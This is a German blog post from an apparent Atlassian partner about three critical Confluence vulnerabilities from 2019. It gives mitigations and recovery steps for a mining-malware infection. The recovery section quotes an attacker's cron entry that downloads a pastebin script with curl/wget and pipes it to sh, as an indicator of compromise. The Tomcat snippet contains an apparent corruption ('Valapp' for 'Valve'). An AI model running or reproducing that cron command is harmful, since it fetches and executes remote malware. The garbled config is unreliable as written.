Do, 18.04.2019
Example Screenshot

Im März gab Atlassian bekannt, dass das Software Confluence (Server und Data Center) zwei kritische Sicherheitslücken enthält und zwar die Apps WebDAV und Widget Connector. Nun wurde am 17. April eine weitere Sicherheitslücke entdeckt.  

Bedauerlicherweise stellten viele andere Solution Partner und auch wir fest, dass in den letzten Tagen vermehrt genau diese Sicherheitslücken von Hackern ausgenutzt wurden, um öffentlich zugängliche Confluence-Instanzen anzugreifen. Damit Sie sich vor Angriffen dieser Art schützen können, empfiehlt Atlassian ein Upgrade auf die aktuellste Confluence Version durchzuführen.

Im folgenden Abschnitt erhalten Sie nähere Informationen über die Auswirkungen dieser Sicherheitsschwachstellen und wie Sie sich von solchen Angriffen erholen können.

 

Über die Sicherheitschwachstellen

WebDAV vulnerability - CVE-2019-3395

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center versions released before the 18th June 2018 are vulnerable to this issue. A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.

All versions of Confluence Server and Confluence Data Center before version 6.6.7, from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x). 

Widget Connector vulnerability - CVE-2019-3396

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

There was an server-side template injection vulnerability in Confluence Server and Data Center, in the Widget Connector. An attacker is able to exploit this issue to achieve server-side template injection, path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x). 

Path traversal in the downloadallattachments resource - CVE-2019-3398

Severity 

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs, or to create a new space or personal space, or who has 'Admin' permissions for a space, can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.  

More Details: https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html

 

Sichern Sie Ihre Instanz!

Zunächst einmal stellen Sie bitte sicher, dass Sie Ihre Confluence-Instanz auf die aktuellste Version umstellen. Auf diese Weise können Sie sich am besten vor dieser Art von Cyberangriffen schützen.

Falls Sie die Enterprise Version von Confluence in Ihrem Hause führen ist es ausreichend, dass Sie die letzte Bugfix-Version installieren. Wenn Sie weder die Enterprise Version, noch die letzten beiden Feature-Versionen von Confluence im Einsatz haben, sollten Sie defintiv auf die aktuellste Version umsteigen!

Ist die Aktualisierung Ihrer Confluence-Instanz nicht möglich, sollten Sie diese umgehend sichern. Im Folgenden erfahren Sie, wie Sie vorgehen müssen:

Mitigation for CVE-2019-3396

If you unable to update Confluence immediately, you can switch to the following link as a temporary workaround. Settings > Manage apps / add-ons select System, and disable the following system plugins in Confluence:

  • WebDAV plugin
  • Widget Connector

If you disable the Widget Connector plugin, the Widget Connector macro will not be available anymore. This macro is used to display content from websites like YouTube, Vimeo, and Twitter. Users will see an 'unknown macro' error. 

If you disable the WebDAV plugin, you will not be able to connect to Confluence using a WebDAV client. Disabling this plugin will also automatically disable the Office Connector plugin, which means Office Connector features, such as "Import from Word" and "Edit in Office" are no longer available. Please be aware that since WebDAV is not required to edit files from Confluence 6.11 and later, it is still possible to edit files in these versions. 

After upgrading, you will need to manually re-enable:

  • WebDAV plugin
  • Widget Connector
  • Office Connector.

 

Mitigation for CVE-2019-3398

If you are unable to upgrade Confluence immediately, as a temporary workaround, you should block the affected URL <base-url>/<context-path>/pages/downloadallattachments.action . Disabling this URL will prevent anyone downloading all attachments via the attachments page or the attachments macro. Downloading individual attachments will continue tol work. 

To block the URL directly in Tomcat:

  1. Stop Confluence.
  2. Edit <install-directory>/conf/server.xml.
  3. Add the following inside the <Host>  element:

    <Context path="/pages/downloadallattachments.action" docBase="" >
        <Valapp className="org.apache.catalina.valapps.RemoteAddrValapp" deny="*" />
    </Context>

    If you run Confluence with a context path, for example /wiki, you will need to include your context path in the path, as shown here:

    <Context path="/wiki/pages/downloadallattachments.action" docBase="" >
        <Valapp className="org.apache.catalina.valapps.RemoteAddrValapp" deny="*" />
    </Context>
  4. Save the file, and restart Confluence.

To verify that the workaround was applied correctly:

  1. Navigate to a page or blog that has 2 or more attachments. 
  2. Go to  > Attachments and then select Download all attachments.

You should see a 404 error and no files should be downloaded.  

 

Sie sind bereits betroffen?

Aktuell sind uns folgende Auswirkungen bekannt, welche durch die Ausnutzung der Sicherheitslücken entstehen können:

  1. Die Instanz ist nicht erreichbar
  2. Die Instanz kann nicht gestartet werden, da das Hochfahren der Instanz innerhalb weniger Sekunden abgeschaltet wird
  3. Starke CPU-Last der verarbeiteten Daten, die vom Confluence-User in speziellen Prozessen wie (sshd, khugepaged, vmlinuz) ausgeführt werden

Beispiel von Htop

Wenn Ihre Confluence-Instanz diese oder ähnliche Symptome aufweist, wurden auch Sie möglichweise von dieser Malware angegriffen. Derzeit haben wir diese Art von Malware-Angriffen nur auf Linux-Systemen identifizieren können. Die Vorgehensweise sieht wie folgt aus. Es werden im „/tmp“ Ordner verschiedene Dateien erstellt. Eine dieser Dateien nennt sich „Seasame“. Diese ist die Malware selbst und ist „/tmp/seasame“ Ordner aufzufinden. Im Wesentlichen bedeutet dies, dass die Malware versucht sich selbst als ein Service zu installieren, einen Cronjob zu registrieren und die Malware selbst auszuführen. Die Beschreibung der Vorgehensweise der Hacker basiert auf unseren aktuellen Analysen, aber selbstverständlich bestehen diverse andere Möglichkeiten die Sicherheitslücken zu missbrauchen.

Wie beheben Sie das Problem, wenn Sie davon betroffen sind?

Bei dem folgenden Schritt handelt es sich um einen Workaround. Sie sollten einen neuen Server installieren und hierzu einfach die Datenbank und den Ordner Confluence-data kopieren. Falls dieser Schritt aktuell keine Option für Sie darstellt, versuchen Sie bitte Folgendes:

  1. Stoppen der Prozesse
  2. Reinigung innerhalb des „/tmp folder“ Ordners, z.B. „rm -Rf /tmp/*“
  3. (Optional) Löschen Sie den Confluence-User (Dadurch wird verhindert, dass die Malware ausgeführt wird)
  4. Überprüfen Sie Cronjobs auf die Malware (Außerdem sollten Sie vielleicht nach einer geänderten noop.jsp suchen).
    Möglicherweise könnte es einen Eintrag wie diesen geben:

    ```*/15 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi%7C%7Cwget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh```

  5. Installieren Sie die aktuellste Version von Confluence
  6. (Optional) Falls der Confluence-User, wie im 3. Schritt beschrieben gelöscht wurde, legen Sie einen User mit einem anderen Namen an

 

Falls immer noch Fragen und Unklarheiten zu diesem Thema bestehen oder Sie technische Unterstützung in dieser Angelegenheit benötigen, zögern Sie bitte nicht venITure zu kontaktieren. (service@venITure.net or +49 221 985 9240)

Neuen Kommentar schreiben

Eingeschränktes HTML

  • Zulässige HTML-Tags: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol start type> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id>
  • HTML - Zeilenumbrüche und Absätze werden automatisch erzeugt.
  • Website- und E-Mail-Adressen werden automatisch in Links umgewandelt.